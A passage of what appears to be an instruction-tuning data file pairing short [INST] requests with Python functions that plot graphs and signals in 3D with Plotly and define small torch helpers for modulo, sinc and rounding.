+ fig = px.scatter_3d(df, x="X", y="Y", z="Z", hover_data=list(graph.vertex_attributes) + ["vertex_index"])
+ fig.update_traces(
+ marker={"size": 5, "color": "crimson", "line": {"width": 2, "color": "DarkSlateGrey"}, "opacity": 1.0},
+ )
+ fig.update_layout(width=500, height=500, margin={"l": 0, "r": 0, "t": 0, "b": 0})
+ fig.show()
+[INST] Visualize a signal on the graph's vertices.. [/INST] def visualize_graph_signal(graph, signal):
+ df = pd.DataFrame({"vertex_index": graph.vertex_index})
+ df["X"], df["Y"], df["Z"] = graph.cartesian_pos()
+ df["signal"] = signal
+ for attr in graph.vertex_attributes:
+ df[attr] = getattr(graph, attr)
+ fig = px.scatter_3d(
+ df,
+ x="X",
+ y="Y",
+ z="Z",
+ color="signal",
+ hover_data=list(graph.vertex_attributes) + ["signal", "vertex_index"],
+ color_continuous_scale="PiYG",
+ color_continuous_midpoint=0.0,
+ )
+ fig.update_traces(
+ marker={"size": 5, "opacity": 1.0},
+ )
+ fig.update_layout(
+ width=600,
+ height=500,
+ margin=dict(l=0, r=0, t=0, b=50),
+ )
+ fig.show()
+[INST] Visualize graph neighborhood of the given vertex.. [/INST] def visualize_graph_neighborhood(graph, vertex_index):
+ df1 = pd.DataFrame()
+ df1["vertex_index"], df1["weight"], df1["sqdist"] = graph.neighborhood(vertex_index)
+ df2 = pd.DataFrame({"vertex_index": graph.vertex_index})
+ df2["X"], df2["Y"], df2["Z"] = graph.cartesian_pos()
+ for attr in graph.vertex_attributes:
+ df2[attr] = getattr(graph, attr)
+ df = pd.merge(df1, df2, on="vertex_index", how="right")
+ df.weight.fillna(0.0, inplace=True)
+ fig = px.scatter_3d(
+ df,
+ x="X",
+ y="Y",
+ z="Z",
+ color="weight",
+ hover_data=list(graph.vertex_attributes) + ["weight", "sqdist", "vertex_index"],
+ color_continuous_scale="PuRd",
+ range_color=[0, 1],
+ )
+ fig.update_traces(
+ marker={"size": 5, "opacity": 1.0},
+ )
+ fig.update_layout(width=600, height=500, margin={"l": 0, "r": 0, "t": 0, "b": 0})
+ fig.show()
+[INST] Returns a new tensor whose elements corresepond to the modulo with offset of the elements of the input.. [/INST] def mod(input, n, d=0.0):
+ return (input - d) % n + d
+[INST] Returns a new tensor whose elements correspond to the sinus cardinal of the elements of the input.. [/INST] def sinc(input):
+ output = torch.sin(input) / input
+ output[input == 0.0] = 1.0
+ return output
+[INST] Returns a new tensor with the rounded to n decimal places version of the elements of the input.. [/INST] def round(input, n_digits=0):
+ return torch.round(input * 10 ** n_digits) / (10 ** n_digits)